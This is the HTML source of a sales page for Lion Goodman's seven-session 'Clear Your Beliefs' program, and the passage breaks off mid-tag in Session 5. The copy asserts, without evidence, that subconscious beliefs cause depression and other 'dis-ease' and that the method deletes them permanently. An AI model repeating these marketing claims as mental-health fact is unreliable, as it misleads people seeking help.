<li>The <em>Clear Your Beliefs Program</em> eliminates beliefs at the core of the psyche.</li>\n	<li>The process utilizes all three levels of the mind: Subconscious, Conscious, and Superconscious.</li>\n	<li>You''re in charge – you decide what you want to believe, and how far you want to go.</li>\n	<li>The program guides you, gently, step-by-step, through the entire process of deleting beliefs.</li>\n	<li>Unlike other methods, the changes you make are permanent – your old beliefs don''t come back.</li>\n</ul>\n</div>\n\n&nbsp;\n\n<h1>Why Aren''t You Living the Life Of Your Dreams Right Now?</h1>\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/shift.jpg"><img class="wp-image-315 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/shift-300x300.jpg" alt="shift" width="155" height="155" /></a> You''re seeking a better life, and you''ve been on the path of personal growth for some time. You''ve tried many teachers and methods. You''ve had some breakthrough experiences and epiphanies. You''ve made progress toward your goals.\n\nYet you continue to fall back into old habits and patterns. In some ways, life remains a struggle against your own internal blocks and resistance, preventing you from moving forward with ease and grace.\n\n&nbsp;\n<h1>What If You Could Permanently Delete Old Habits And Patterns – So They <em>Didn''t</em> Come Back?</h1>\nHundreds of teachers and organizations offer the next miracle cure for what they believe ails you. They promise to improve some area of your life or business, yet their "fixes" tend to wear off over time. After taking their program, you''re revved up, transformed, and ready to go.\n\n<strong>Two weeks later,</strong> you''re mostly doing the same things as before. Your issues have returned to haunt you. Nothing significant has changed. You''re still not taking consistent actions to reach your goals or change your life.\n&nbsp;\n<h1><center><a class="big button blue" href="http://clearyourbeliefs.com/program/#package">Okay, I''m convinced!<br />Take me to the program description,<br />tell me about all the cool bonuses I''ll get,<br />and how much it costs...</a><br /></center></h1>\n&nbsp;\n<h1>Why Does This Happen?</h1>\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain2.jpg"><img class=" wp-image-299 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain2-300x300.jpg" alt="brain" width="153" height="153" /></a>Have you heard the myth, <em>"It takes 30 days to change a habit?"</em> <strong>It''s not true.</strong> Research shows that some simple habits can be changed in only 30 days, but to make significant life changes, it takes <span style="text-decoration: underline;">much</span> more time and practice.\n\nNeuroscientists call the brain''s ability to change over time "neuroplasticity."\n\nIt can take months – or <em>years</em> – of hard work to shift old patterns of behavior. Eventually, new habits will replace the old ones. But that requires consistent, steady efforts – and <strong>most people give up long before that happens.</strong>\n\n&nbsp;\n<h1>To Make Real Change, You Have To Get To The Root of Things</h1>\n<span style="color: #000000;">The best doctors seek the <em>source</em> the <em>source</em> of the dis-ease. They don''t just prescribe drugs to treat your symptoms. Drugs like that make you feel a little better for awhile, but they don''t solve the <em>cause</em> of the problem – where the illness is being generated.<img class=" wp-image-324 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/weedjpg-300x199.jpg" alt="weedjpg-300x199" width="184" height="122" /></span>\n\nIf you don''t pull weeds up by the roots, they just grow back – again and again. So what, then, is at the root of the habits and patterns in your life that cause you so much unhappiness?\n\n&nbsp;\n<h1>Beliefs Are The Foundation Of Your Experience</h1>\nYour psychological, emotional, and spiritual dis-ease are caused primarily by your <em>beliefs.</em> We usually think of beliefs as consciously held convictions, but our strongest and most deeply held beliefs are unconscious. They operate <em>through us</em>, and they are at the root of all the habits and patterns in our life. But we''re only dimly aware of them, or not aware of them at all. <strong>Yet beliefs are at the core of every experience, decision, and pattern in our lives.</strong>\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/construction-300x224.jpg"><img class=" wp-image-320 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/construction-300x224.jpg" alt="construction-300x224" width="158" height="118" /></a><span style="color: #000080;">Beliefs can be seen as the literal<em> foundation</em> of consciousness, upon which our thoughts, feelings, and attitudes are built.</span>\n\n<span style="color: #000000;"><strong>We literally <span style="text-decoration: underline;">create our reality</span> with our beliefs.</strong></span>\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/dilap.jpg"><img class=" wp-image-321 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/dilap.jpg" alt="dilap" width="157" height="114" /></a>If you build a house on a shaky ground, it doesn''t matter how much redecorating you do. It will buckle, and eventually fall. You can fervently practice meditation, visualization, or business building skills, but if there are sneaky saboteurs in the basement of your mind, pulling the foundation out from under you, you won''t be able to achieve permanent success.\n\n&nbsp;\n<h1>Upgrade Your Human Operating System</h1>\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/brain-open.jpg"><img class=" wp-image-328 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/brain-open-254x300.jpg" alt="brain-open" width="123" height="146" /></a> Your brain/mind is more sophisticated than the fastest supercomputer. Like a computer, you have an underlying Operating System. If your O.S. has faulty programming, havoc results – especially when you try to run a sophisticated application – <em>like managing your life</em>.\n\nNegative beliefs operate like a badly programmed operating system, messing up everything else, and preventing you from doing what you came here to do. <strong>Do you ever have thoughts like these?</strong>\n<div class="icon_box bullets">\n<ul class="two-col">\n	<li><strong><em>I''m not enough.</em></strong></li>\n	<li><strong><em>I can''t do it.</em></strong></li>\n	<li><strong><em>I''m not worthy.</em></strong></li>\n	<li><strong><strong><em>I''ll never be like them.</em></strong></strong></li>\n	<li><strong><em>I''m all alone.</em></strong></li>\n</ul>\n<ul class="two-col rt">\n	<li><strong><em>I need to do more (or better) to be accepted.</em></strong></li>\n	<li><strong><em>There''s something wrong with me.</em></strong></li>\n	<li><strong><em>I''m fundamentally flawed.</em></strong></li>\n	<li><strong><em><strong><em>Nobody wants what I have to offer.</em></strong></em></strong></li>\n	<li><strong><em><strong><em>If I speak up, something bad will happen.</em></strong></em></strong></li>\n</ul>\n</div>\nThese beliefs may appear as inner voices that criticize or diminish you. They can cause depression, self-loathing, over-achieving, self-sacrifice, or other negative conditions.\n\nAt the core of every bad feeling you have about yourself, and every limitation you have, there''s a belief operating in the background, like an annoying little machine that you can''t turn off.\n\n<strong>Here''s the good news:</strong> <strong><span style="color: #333399;">Every belief, no matter how deep, can be pulled up for examination, and changed. Simply and easily.</span></strong>\n\n&nbsp;\n<h1>The Garden Of Your Mind</h1>\n\n<p style="text-align: left;"><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain-tree1.jpg"><img class=" wp-image-246 alignright" style="margin-left: 20px; margin-right: 20px;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain-tree1-300x300.jpg" alt="brain-tree" width="150" height="150" /></a> When you build a new garden, you begin by clearing the ground, removing rocks and weeds. Then you amend the soil and install a watering system so your plants will thrive. Only THEN do you plant the fruits, vegetables and flowers you want to grow and enjoy.<br /><br />\n\nThe same thing is true in your subconscious mind:\n\n<strong>First clear the old beliefs out of the way, THEN install new, empowering beliefs you want to enjoy.</strong><br /><br />\n\n<strong>It''s that simple.</strong></p>\n\n\n<h1>Beliefs Reside In The Subconscious Mind</h1>\n<div class="parg-text"><p style="text-align: left;">If you want to change your beliefs, you have to work with them<em> where they live</em>. <strong>Your conscious mind isn''t the right tool for making changes in your subconscious</strong> – it''s like tilling the garden with a screwdriver.</p>\n<p style="text-align: left;"><img class=" wp-image-323 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/water-300x201.jpg" alt="water-300x201" width="179" height="119" />To pull old beliefs out by the root, you need an effective method that dives down to the core of your psyche – deeper than words can go, deeper than talk therapy, or weekend workshops.</p>\nWhen you make changes in your subconscious mind directly, change is permanent. <strong>You become different. Life becomes different.</strong></p>\n\n<div class="parg-text"><p>A shift at the core of the psyche expands out like a pebble''s wave in a still pond – effortlessly and easily. <strong>The new beliefs you choose simply manifest – without repetition, resistance or struggle.</strong></p></div>\n\n<h1>Beliefs Are The Lens Through Which You See The World</h1>\n<div class="parg-text"><p><strong><em>How you see yourself</em> </strong>is determined by your beliefs - most of which were indoctrinated into you.</p>\n\n<div class="parg-text"><p><em><strong>How you view others </strong></em>is colored by your beliefs about them.</p>\n\n<div class="parg-text"><p><img class=" wp-image-322 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/glasses1-300x256.jpg" alt="glasses1-300x256" width="164" height="140" /><strong><em>Your experience of the world </em></strong>is shaped (and often distorted) by your beliefs. <em><strong>Your entire life experience</strong> </em>is constructed by the beliefs you''ve accumulated since you were an infant.</p>\n\n<div class="parg-text"><p>Change the lens of your beliefs, and you''ll change <strong>both</strong> your perception <strong><span style="text-decoration: underline;">and</span></strong> your experience. <strong>Change your beliefs, and your circumstances and your possibilities will also change.</strong></p>\n\n<div class="parg-text"><p><strong> <span style="color: #000080;">It''s that simple.</span></strong></p></div></div></div></div>\n\n&nbsp;\n<h1>Why Beliefs Are Difficult To Change</h1>\n<div class="parg-text"><p>Many people agree that, <em>"Your beliefs create your reality," </em>and tell you to "<em>Just change your beliefs!</em>" Few offer specific tools that will change your beliefs <em>permanently</em>. There''s a good reason: <strong>Beliefs </strong><strong>reside in your subconscious mind </strong>– below the level of conscious awareness.</p></div>\n\n<div class="parg-text"><p><strong>When you were young, your parents and caregivers indoctrinated you with their beliefs</strong>. It began when you were an infant, before you could speak. Those indoctrinated beliefs are buried deep in your pre-verbal memory. Most methods can''t reach the basement where they''re stored.</p></div>\n\n<div class="parg-text"><p>Your parents and caregivers indoctrinated you for a good reason: they wanted you to survive and thrive. Their beliefs allowed <em>them</em> to survive, so they wanted you to have those beliefs, too – whether they were a good fit for you or not. They didn''t know any better. it''s exactly what <em>their parents</em> did to<em> them</em>.</p></div>\n\n<div class="parg-text"><p>You formed your <strong>self-view</strong> and <strong>world-view</strong> from those indoctrinated beliefs, unconsciously. You didn''t know any better at the time, and you rarely questioned it. It was just "what was so."</p></div>\n\n&nbsp;\n<h1>Why We React The Way We Do</h1>\n<div class="parg-text"><p>When you <strong>react</strong> to someone or something, you''re seeing old beliefs at work. You may ask yourself afterwards:</p></div>\n\n<div class="parg-text"><p><img class="alignleft wp-image-298" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/react1-300x217.jpg" alt="react" width="187" height="135" /></p></div>\n\n<p><ul class="indented-img-left"><br />\n	<li>Why did I say that?</li>\n	<li>What''s wrong with me?</li>\n	<li>Why didn''t I follow through?</li>\n	<li>Why did I react that way?</li>\n	<li>What the hell just happened?</li>\n</ul></p>\n<em>\n<div class="parg-text"><p>"Sudden Reaction Syndrome"</em> can be traced back to the beliefs buried deep in your subconscious mind. Whenever your early childhood beliefs get triggered, the old pattern of reaction jumps up and hijacks your logical, adult mind.</p></div>\n\n<div class="parg-text"><p>These programs are like mousetraps in your mind''s basement. They lie quietly until someone steps on them. Then they snap, and take control. You suddenly react. Your responses and behavior are suddenly out of your own conscious control.</p></div>\n\n<div class="parg-text"><p><strong>You can change these reactive patterns – if you''re willing to clean out your basement.</strong></p></div>\n\n&nbsp;\n<h1>Why Most Belief-Change Methods Don''t Work</h1>\n<div class="parg-text"><p><strong>Here''s a test for any method of changing beliefs: Did the problem go away completely?</strong> Did it stay away? Or did it return?</p></div>\n\n<div class="parg-text"><p><a href="http://clearyourbeliefs.com/wp-content/uploads/2014/04/eye1.jpg"><img class="alignright  wp-image-248" src="http://clearyourbeliefs.com/wp-content/uploads/2014/04/eye1-300x225.jpg" alt="eye" width="179" height="134" /></a>Every method works for some people, some of the time. If you can use it to create permanent change, it''s a good methodology for you. But most methods create only temporary relief. Beliefs return, and cause the same problem again and again. </p></div><p><strong>Here''s why:</strong></p>\n<ul class="indented">\n	<li><span style="color: #333399;"><strong>Affirmations</strong> </span>are new beliefs you want to install. You can say them all day long, but they don''t change anything at the subconscious level. Repeating them over and over is like stomping on weeds, hoping they go away on their own. Affirmations make you feel better in the short term, but the feelings fade quickly – because the previous beliefs haven''t been eliminated from the subconscious.</li>\n	<li><span style="color: #333399;"><strong>That Belief Isn''t True.</strong> </span> Many methods help you recognize that an old belief isn''t true anymore. Techniques like Byron Katie''s <em>The Work</em> free you at the conscious level, but they don''t clear the causal level, where beliefs are stored in the subconscious mind.</li>\n	<li><span style="color: #333399;"><strong>Tap Your Problem Away. </strong> </span>Many techniques use muscle testing or tapping (e.g., EFT) to shift your attention and energy. They may remind you to love yourself just the way you are (which is good advice!). At the moment you tap or test, your blocked energy is freed, and you can move forward. But too often, you meet those same negative beliefs further down the road.</li>\n</ul>\n<div class="parg-text"><p>Most belief-change methodologies have the same result – the old beliefs pop up again later. The process didn''t create permanent change. <strong>The problem isn''t you! The problem is with the method – it was only partially effective!</strong></p></div>\n\n&nbsp;\n<h1>Here''s Some Good News</h1>\n<ul class="indented">\n	<li><strong><strong><strong><span style="color: #000080;">First:</span> It''s not your fault. There''s nothing wrong with you.</strong></strong></strong></li>\n	<li><strong><span style="color: #000080;">Second:</span> You <span style="text-decoration: underline;">can</span> change your beliefs <em>permanently</em>.</strong></li>\n</ul>\n<div class="parg-text"><p>To get real, lasting change, you need to use a process that pulls your limiting and negative beliefs out by the<em> roots</em>. Otherwise, they''ll pop up later and create the same problem – again and again.</p></div>\n\n<div class="parg-text"><p>You can now <em><strong>Clear Your Beliefs – </strong></em><strong>permanently</strong>.</p></div>\n\n<h1>Imagine The Life You Desire</h1>\n<div class="parg-text"><p><strong>Can you imagine this?</strong></p>\n\n<img class="alignleft wp-image-296" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/mother-daughter2-300x200.jpg" alt="mother-daughter" width="197" height="131" />\n\n	<p>You''re no longer held back by old beliefs and stories.</p>\n	<p>There''s no resistance to doing what needs to be done.</p>\n	<p>You feel joy and positive energy as you move forward to create the life of your dreams.</p>\n\n&nbsp;\n<h1>Want To Manifest? Begin With A Mind Makeover</h1>\n <div class="parg-text"><p><strong><em>Manifestation</em> is the process of envisioning what you want, and then doing whatever is necessary to turn it into a reality. </strong></p>\n\n<div class="parg-text"><p><img class="alignright wp-image-756" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/shell1-300x200.jpg" alt="shell" width="188" height="125" />However, whenever you start a new project, or attempt to create something new, your old beliefs jump up and offer their unwanted advice: <em>"You''ll never accomplish that." "No one would pay money for it!" "Who do you think you are?"</em></p>\n\n<div class="parg-text"><p>Those discouraging words often stop us from moving forward. You need a way to clear those voices – because they WILL come up – it''s inevitable. It''s how beliefs work.</p>\n\n<div class="parg-text"><p><em><strong>Clear Your Beliefs</strong></em> is a completely new approach to solving this problem. The process is easy to learn, and easy to do.<strong> It changes beliefs at the core of the psyche, so they never return.</strong></p>\n\n&nbsp;\n<h1>Clear Whatever Is In The Way</h1>\n<div class="parg-text"><p><img class="alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/puddle1-300x300.jpg" alt="puddle" width="146" height="146" />You can finally remove those pesky blocks and barriers that keep getting in your way. Using a powerful (and fun) guided imagery process, you''ll be guided to reach down into your subconscious mind to the source of your old beliefs. When you delete them from here, they don''t come back. Old thoughts, doubts, and fears simply disappear – for good. Your life changes. You can create what you want, without interference.</p>\n\n<div class="parg-text"><p><strong>The<em> Clear Your Beliefs process</em> frees you </strong>from unwanted negative voices and experiences by dissolving emotional and somatic anchors that hold your negative beliefs in place. <strong>As a result, you have more of the experiences you want, and fewer of the experiences you <em>don''t</em> want.</strong></p></div>\n\n&nbsp;\n<h1>Is This A Guaranteed Cure-All?</h1>\n<div class="parg-text"><p><a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/praying-to-Sol.jpg"><img class="alignright  wp-image-877" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/praying-to-Sol-225x300.jpg" alt="praying to Sol" width="129" height="172" /></a>Unfortunately, no. There are no magic bullets that can remove your suffering instantly and magically. We use words like "<em>You can create the life of your dreams...</em>" to tell you what you CAN achieve, if you do the work.</p>\n\n<div class="parg-text"><p>No technique can cure your ills or transform your life if you don''t use it. It takes work and dedication on your part. As miraculous as this process is, there are no free rides.</p>\n\n<div class="parg-text"><p>During the past ten years, thousands of clients have used this technique to clear almost every type of problem and issue known to humans. When you place your attention on the source, at the causal level, down where your beliefs are stored, you can clear your earliest, pre-verbal programs. It takes some work, and it''s <em>very </em>effective.</p></div>\n\n&nbsp;\n<h1>The Clear Your Beliefs program can:</h1>\n<ul class="indented">\n	<li>Eliminate blocks, resistance, and fears that have prevented you from showing up authentically and fulfilling your purpose.</li>\n	<li>Remove the cold, wet blanket that your parents, teachers, and society threw over you (and your dreams) when you were young.</li>\n	<li>Give you the power to change your experiences – and your circumstances – at will.</li>\n	<li>Show you how to gain mastery over your moods, perceptions, and responses.</li>\n</ul>\n&nbsp;\n<h1>How the <em>Clear Your Beliefs </em>Program Shifts Your Life</h1>\n <div class="parg-text"><p><a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/lotus-flower-reflected.jpg"><img class="alignleft wp-image-962 " src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/lotus-flower-reflected-300x225.jpg" alt="lotus flower reflected" width="180" height="135" /></a>During the 7-week <em>Clear Your Beliefs</em> program, all aspects of you – mental, emotional, physical, and spiritual – are invited to work together to transform your psychological <em>set point</em> – the inner structure of your personality that formed during your first years of life.</p></div>\n\n <div class="parg-text"><p>If you''re ready to remove limitations that have held you back, and create the life of your dreams, join us for this 7-part program skillfully led by Lion Goodman, creator of the <em>BeliefCloset Process<strong>. </strong></em></p></div>\n\n <div class="parg-text"><p>During each class, you''ll uproot subconscious beliefs that have interfered with your success, happiness and personal freedom. You''ll upgrade your health, your work, and your relationships. You''ll examine and eliminate beliefs that were programmed into you about yourself, other people, and the world.</p></div>\n\n <div class="parg-text"><p>If you''re purchasing this program as a part of a Clear Your Beliefs Coaching package, your Coach will meet with you once each week (or as you''ve arranged) to follow up on the work you did with the recorded class.  He or she will help you go deeper than you could possibly go with a recorded class, or on your own.  He or she will guide you carefully into the depths of your subconscious beliefs, and make this program even more effective.</p></div>\n<div class="icon_box">\n<h1>With This Methodology, You Can Finally:</h1>\n<ul class="check">\n	<li>Manifest your dreams and your life purpose<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/stone-doorway.jpg"><img class=" wp-image-317 alignright" style="" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/stone-doorway-220x300.jpg" alt="stone-doorway" width="150" height="205" /></a></li>\n	<li>Remove resistance and barriers</li>\n	<li>Open doors to new opportunities</li>\n	<li>Eliminate pain and suffering from the past</li>\n	<li>Experience more fulfillment in your relationships</li>\n	<li>Attract more abundance and prosperity</li>\n	<li>Increase your energy, vitality, and productivity</li>\n</ul>\n</div>\n <div class="parg-text"><p><strong>You''ll step more fully into living as the magnificent, radiant being you already are</strong> (and eliminate the fear of doing so!).</p></div>\n\n&nbsp;\n<div class="message_box">\n<h1>A Message from Lion Goodman...</h1>\n<div class="mb-img">\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/04/lion-full1.jpg"><img class="alignleft wp-image-384 " src="http://clearyourbeliefs.com/wp-content/uploads/2014/04/lion-full1.jpg" alt="lion-full1" width="171" height="236" /></a></div>\n<p>Dear Explorer:</p>\n<p>As a child, I believed there was something wrong with me. I didn''t look or feel like the other kids. I didn''t like who I was. I felt separate and alone. I didn''t know how to make it better.</p>\n\n<p>I was gripped by some of life''s biggest questions: "Who am I? Why am I here? What makes me different? What is life about?"</p>\n\n<p>I began to search for answers, learning everything I could, hoping someday I would figure it all out, and finally become normal and accepted. (Fortunately, the "normal" part never happened!)</p>\n\n<p>After decades of studying psychology, neurology, philosophy, history, religions, and engaging in therapy, workshops, and spiritual practices, I found answers to most of my questions.</p>\n\n<p>I noticed that whenever my life changed for the better, there had been shifts in my beliefs: When I changed my beliefs about myself, I became happier and more successful. When I changed my beliefs about others, my relationships improved. When I shifted my beliefs about the world and it''s possibilities, new opportunities came my way.</p>\n\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/studied1.jpg"><img class=" wp-image-295 alignright" style="margin-top: 5px; margin-bottom: 5px;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/studied1-289x300.jpg" alt="studied" width="198" height="206" /></a>The most powerful leverage for success turned out to be <em><strong>my beliefs</strong></em>. So I searched for ways to change beliefs directly. I wanted a method that worked consistently, and transformed beliefs permanently.</p>\n\n<p>The belief-change methods I studied turned out to be only partially effective. I asked Source to help me with this dilemma. And one day, I received a divine gift: a "download" – a way to delete beliefs easily and permanently by engaging the subconscious mind in a playful way. I called it <em>The BeliefCloset Process<strong>®</strong></em> because it used the colorful metaphor of <em>clothing in your closet</em> to represent <em>beliefs in your subconscious mind</em>.</p>\n\n<p>When your closet is crammed full of old outfits you''ll never wear, it''s time for some Spring cleaning!</p>\n\n<p><em>The BeliefCloset Process</em> turned out to be much more than a belief-delete button. It''s a method for <strong>healing deep psychological wounds.</strong></p>\n\n<p>Having worked with thousands of clients over the past decade, I''ve watched profound change echo through their lives, lightening their burdens and creating a brighter future. During the past decade, I''ve taught this methodology to hundreds of coaches, therapists and healers in 18 countries around the world. Testimonials from clients pour in, expressing deep gratitude for the ability to clear long-standing problems that other methods haven''t touched.</p>\n\n<p>I am grateful to have brought it through. Now I want to share it with you. In the <strong><em>Clear Your Beliefs </em></strong>program, you''ll use the <em>BeliefCloset Process </em>to shift beliefs that no longer serve you. <a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/key1.jpg"><img class=" wp-image-253 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/key1-220x300.jpg" alt="key" width="151" height="207" /></a>Your old programs might be creating a mess in your relationship with your partner, or your children. They might be limiting your business or financial success. Your beliefs about work may be making you unhappy, or your beliefs about your body may be impacting your health.</p>\n\n<p>If you feel limited or stuck in any part of your life, there are beliefs underneath those feelings – and you can change them.</p>\n\n<p>A lot of people say, "just change your beliefs..." as if it were easy. The truth is, it takes the right technique, applied in the right way, along with the right guidance.</p>\n\n<p>In the <em>Clear Your Beliefs</em> course, you''ll get guidance from me, through a series of recorded classes. If you''re registering as a part of a Clear Your Beliefs Coaching package, you''ll work with your professional <em>Clear Your Beliefs Coach </em>in private sessions to follow up on your work with each recording.  You''ll experience seven sessions of deep healing and transformation, then go deeper with your coach each week. Clear your old beliefs, and create the life you want.</p>\n\n<p>This is <em>true self-empowerment</em>. Decide what you want, and how you want to live. Then go out and make it so. Use the process to clear whatever gets in your way. Your light will shine more brightly, and new possibilities will open.</p>\n\n<p>Live the life of your dreams. There''s nothing to stop you – except a few old beliefs...</p>\n\n<p>In gratitude, and with warm wishes for your total success,</p>\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/lion-signature-300x70.png"><img class="alignnone  wp-image-490 no-shad" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/lion-signature-300x70.png" alt="lion-signature-300x70" width="377" height="87" /></a>\n\n<p>Lion Goodman, Creator of <em>The BeliefCloset Process</em></p>\n\n</div>\n&nbsp;\n<h1>Register Today and Discover What''s Possible</h1>\n <div class="parg-text"><p>We are delighted to offer you this empowering program, which thousands of people from around the world have successfully completed. You''ll receive <strong>seven 90-minute recorded sessions</strong>, which you can listen to at your convenience, and if you''ve registered for a coaching package, you''ll go deeper each week with your coach. You''ll learn about beliefs and how to change them with the <em>BeliefCloset Process</em>, a powerful methodology used by hundreds of coaches and therapists around the world.</p></div>\n\n&nbsp;\n<div class="module">\n<div class="mod_h">\n<h5><span class="session">Session 1:   </span><strong>Pull All the Old Junk Out of Your BeliefCloset®</strong></h5>\n</div>\n<div class="module_body">\n\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/mod1.jpg"><img class=" wp-image-309 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/mod1-199x300.jpg" alt="mod1" width="130" height="212" /></a>When you begin Spring cleaning, the first step is that dreaded moment when you open the door to your closet, and realize that you have to take everything <strong>out</strong> in order to begin the sorting process, before you can decide what to keep and what to toss.</p>\n\n<p>In this first session, you''ll examine your old beliefs, and determine which ones no longer serve you.  It''s time to discard them and clear some space!  You''ll get your first in-depth experience with the <em>BeliefCloset Process</em> and discover that you can permanently delete a belief from your past – even beliefs that have been annoying you for decades.  You''ll feel more open, empowered and free to choose your beliefs and the way you live your life.</p>\n\n</div>\n<div class="module_body">\n\n<strong> In Session 1, you will:</strong>\n<ul>\n	<li>Discover old limiting beliefs that are deeply buried in your subconscious mind</li>\n	<li>Learn which ones keep you stuck, preventing you from having what you want in life</li>\n	<li>Experience a process that returns you to your True Self, the home of inner joy and bliss</li>\n	<li>Begin to work with, not against, your subconscious mind – where your beliefs reside</li>\n</ul>\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h">\n<h5><span class="session">Session 2:   </span><strong>Clear Your Negative Beliefs About Who You Are</strong></h5>\n</div>\n<div class="module_body">\n\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess2.jpg"><img class=" wp-image-375 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess2-300x199.jpg" alt="sess2" width="194" height="128" /></a>In the 2nd module, you''ll focus on issues and problems that have kept you from being happy and joyful.</p>\n\n<p>What do you believe about yourself? Your idea of "Who I am" is based on beliefs and programming you got as a child.  What messages did your parents, caregivers, and siblings plant in your child brain that still affect you? In the BeliefCloset, keeping your old beliefs about who you are is akin to keeping all of your infant clothes (including those smelly diapers!) in your closet.  It''s time to haul them out, and toss them out! You don''t need them anymore.  If you hear critical inner voices berating you, don''t miss this session.  Rid yourself of those pesky critical voices along with the diapers!</p>\n\n</div>\n<div class="module_body"></div>\n<div class="module_body">\n\n<strong> In Session 2, you will:</strong>\n<ul>\n	<li>Use the <em>BeliefCloset Process</em> to get underneath negative feelings about yourself</li>\n	<li>Clear old, limiting beliefs about who you are, and what you deserve, so you can enjoy life again</li>\n	<li>See your own magnificence through a new clear lens of your own beauty and joy</li>\n</ul>\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h">\n<h5><span class="session">Session 3:  </span><strong>Clear Your Limiting Beliefs About What You Are Capable Of</strong></h5>\n</div>\n<div class="module_body">\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess3.jpg"><img class=" wp-image-311 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess3-300x200.jpg" alt="sess3" width="206" height="137" /></a>Your abilities are limited only by your beliefs. If someone else can do it, so can you.\n\nThis isn''t a magic pill – you still have to learn skills and practice them – but the only thing in your way is your old beliefs.\n\n<em>What are you capable of?  </em>If your answer is "Anything..." you don''t need this session.  But most of us think too small...\n\n</div>\n<div class="module_body">\n\nOur <em><strong>will</strong></em> has been weakened from lack of use – like muscles that shrink when they''re not exercised.  We let our negative beliefs stop us. You may hear internal voices say, <em>"What''s the use?  You''ll fail anyway. You don''t deserve happiness – look at you!"  </em>We were shamed into thinking that we were less than others.We learned to compare ourselves to others – and we always lose that contest.  Clear out any apparent limitations you''ve taken on, and find your true power to create what you want.  Do whatever you need to do in order to achieve your vision.\n\n</div>\n<div class="module_body"></div>\n<div class="module_body">Do you have beliefs that stop you from dreaming big, or following through? Do you procrastinate or get distracted? In this session, you''ll eliminate those beliefs and relieve yourself of those symptoms. You''re already a master manifestor – you''re just manifesting your old programs!</div>\n<div class="module_body"></div>\n<div class="module_body">\n\n<strong> In Session 3, you will:</strong>\n<ul>\n	<li>Identify old beliefs that stand between you and creating the life you want</li>\n	<li>Dissolve the old beliefs that get in your way over and over, or make you quit when you''re partway there.</li>\n	<li>Imagine what it means to live without self-imposed limitations, trusting that you can create anything you want</li>\n</ul>\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h">\n<h5><span class="session">Session 4:   </span><strong>Clear Your Outdated Beliefs About Love and Relationships</strong></h5>\n</div>\n<div class="module_body">\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess4.jpg"><img class=" wp-image-312 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess4-300x177.jpg" alt="sess4" width="237" height="141" /></a>In this session, you''ll delete beliefs that interfere with your personal relationships.\n\nIf you''re married, are you happy and secure?   Or are you anxious about the future?   If you''re not in a relationship, what''s holding you back from finding your ideal mate?\n\nHumans are social creatures – we must relate to others to survive.  At our core, we want a security and safety, but we also want passion and romance.  You learned "what love is" from your parents – so it''s no wonder that you''re confused!  Most of us repeat patterns we learned from our early childhood.  We watched our parents interact, and Mom and Dad''s relationship became our model of what a relationship is supposed to look like.  In your family, love may have been  contaminated by disdain, contempt, withdrawal, or abuse.  We were programmed to repeat their patterns – without conscious choice.  This session looks at early infant bonding patterns and how those patterns get reproduced in our adult relationships unconsciously – until we change them.\n\n</div>\n&nbsp;\n<div class="module_body"></div>\n<div class="module_body">\n\n<strong> In Session 4, you will:</strong>\n<ul>\n	<li>Look deeply into the childhood patterns that enabled you to survive and thrive</li>\n	<li>See which of your beliefs now interfere with your intimate relationships</li>\n	<li>Discover how easy it is to shift these beliefs at the core of the psyche and transform relationship difficulties into vibrant, loving interactions</li>\n</ul>\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h">\n<h5><span class="session">Session 5:   </span><strong>Clear Your Old Beliefs About Money and Work</strong></h5>\n</div>\n<div class="module_body">\n\n<a 